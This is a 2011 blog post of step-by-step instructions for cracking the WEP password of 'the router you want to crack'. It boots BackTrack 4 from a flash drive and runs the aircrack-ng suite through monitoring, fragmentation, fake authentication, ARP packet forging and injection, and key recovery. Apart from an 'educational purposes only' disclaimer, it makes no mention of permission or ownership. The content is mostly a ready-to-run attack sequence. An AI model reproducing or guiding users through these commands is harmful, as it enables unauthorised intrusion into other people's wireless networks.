Wednesday, March 16, 2011

How to Crack WEP Passwords

Once again EDUCATIONAL PURPOSES ONLY!!
Requirements:
-Laptop
-At least 2gb Flashdrive
-Backtrack 4 final iso:http://www.backtrack-linux.org/downloads/
-Unetbootin: http://unetbootin.sourceforge.net/
-A compatible wireless network card. I'm using the alfa usb adapter
1. Go to Computer, right click on your flash drive and click format. Check quick format, and set the format to FAT32(Default)
2. After it's done formatting, open Unetbootin. Click on diskimage, and browse for the backtrack 4 final iso on your computer that you downloaded. Then choose which usb port your flash drive is in and click start.
3. After that's done, reboot your computer and boot from flash drive. If you don't know how to do that just google your computer brand and how to boot it from a flash drive. Once your booted from a flash drive, select default, and backtrack should load. Type startx to load backtrack.
4. After the desktop loads click on the black screen on the bottom left of your screen. Type airmon-ng. If your wireless card is compatible, it will show up in the interface list.
5. Type airmon-ng start YOUR INTERFACE
6. Type airodump-ng mon0
7. Find the BSSID of the router you want to crack. The BSSID is the set of numbers on the left. Type airodump-ng --bssid ENTER THE BSSID --channel ENTER THE CHANNEL # OF THE ROUTER --ivs -w ex mon0
8. Type aireplay-ng -5 -b ENTER THE BSSID mon0
9. Type aireplay-ng -1 1 -a ENTER THE BSSID mon0
10. Type packetforge-ng -0 -a ENTER THE BSSID -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y TYPE THE NAME OF THE .XOR FILE ON YOUR DESKTOP -w arpy
11. Type aireplay-ng -3 -r arpy -b ENTER THE BSSID mon0
12. Finally, type aircrack-ng ex-01.ivs
**You may have to open different konsoles for each command. That is ok.**

No comments:

Post a Comment